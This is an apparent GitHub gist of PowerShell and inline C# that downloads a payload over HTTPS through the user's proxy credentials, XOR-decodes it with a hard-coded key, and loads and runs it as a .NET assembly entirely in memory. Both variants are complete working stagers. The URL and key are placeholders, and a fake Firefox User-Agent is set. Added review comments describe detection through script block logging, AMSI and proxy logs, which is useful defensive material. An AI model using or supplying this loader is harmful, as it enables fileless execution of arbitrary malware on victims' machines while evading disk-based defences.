
@cryptonic01
Forked from Arno0x/loadAssembly_method1.ps1
Created July 24, 2018 18:29
Load a .NET assembly dynamically from PowerShell
# Variant using Add-Type: a small C# helper is compiled at run time and then called.
# The helper in the here-string below does three things, all on byte arrays in memory:
#   1. Downloads data over HTTPS with WebClient, through the system default proxy
#      using the current user's default credentials.
#   2. XORs every downloaded byte with a repeating key held in a string literal.
#   3. Hands the result to Assembly.Load(byte[]) and invokes the assembly's
#      EntryPoint by reflection with one string[] argument.
# The URL and the key are placeholders ("https://xxxxx", "xxxxxxxxx").
#
# Review notes:
#   - The repeating-key XOR is obfuscation, not encryption or authentication: the key
#     sits in the script, so script plus captured download is enough to recover the
#     assembly for analysis.
#   - The downloaded bytes are executed without any hash or signature check.
#   - The payload itself is never written to disk by this code, so visibility depends on
#     PowerShell script block logging (event ID 4104), AMSI (which also scans
#     Assembly.Load(byte[]) on .NET Framework 4.8 and later), .NET runtime loader
#     telemetry, and proxy/TLS logs for the outbound request.
#   - NOTE(review): on Windows PowerShell, Add-Type with C# source normally runs the C#
#     compiler and leaves temporary build files; confirm for the PowerShell version in use.
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {
defaultProxy.Credentials = CredentialCache.DefaultCredentials;
webclient.Proxy = defaultProxy;
}
byte[] b = webclient.DownloadData("https://xxxxx");
string key = "xxxxxxxxx";
for(int i = 0; i < b.Length; i++) { b[i] = (byte) (b[i] ^ key[i % key.Length]); }
string[] parameters = new string[] {"acesstoken"};
object[] args = new object[] {parameters};
Assembly a = Assembly.Load(b);
MethodInfo method = a.EntryPoint;
object o = a.CreateInstance(method.Name);
method.Invoke(o, args); }}}
"@
# Compile the C# source above into the current PowerShell session.
Add-Type -TypeDefinition $Source -Language CSharp
# Call the compiled static method; this is the point where the download,
# XOR pass and reflective invocation actually run.
[LoadAssembly.LoadAssembly]::load()
# Variant without Add-Type: the same download / XOR / Assembly.Load sequence written
# directly in PowerShell, so no C# compilation step is involved.
# The WebClient gets a fixed Firefox 49 / Windows NT 6.1 User-Agent header and uses the
# system default proxy with the current user's default network credentials.
# Review note: a hard-coded User-Agent that does not match the host's real browser is a
# stable string to look for in proxy logs.
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
# Download the bytes and XOR each one with the repeating key $k. The URL and key are
# placeholders; the XOR is obfuscation only, and nothing verifies the content.
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
# Load the resulting byte array as a .NET assembly in the current process; the returned
# Assembly object is discarded.
[System.Reflection.Assembly]::Load($b) | Out-Null
# Call a static Main on a type from the loaded assembly. "namespace.Class" and the
# argument values are placeholders.
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)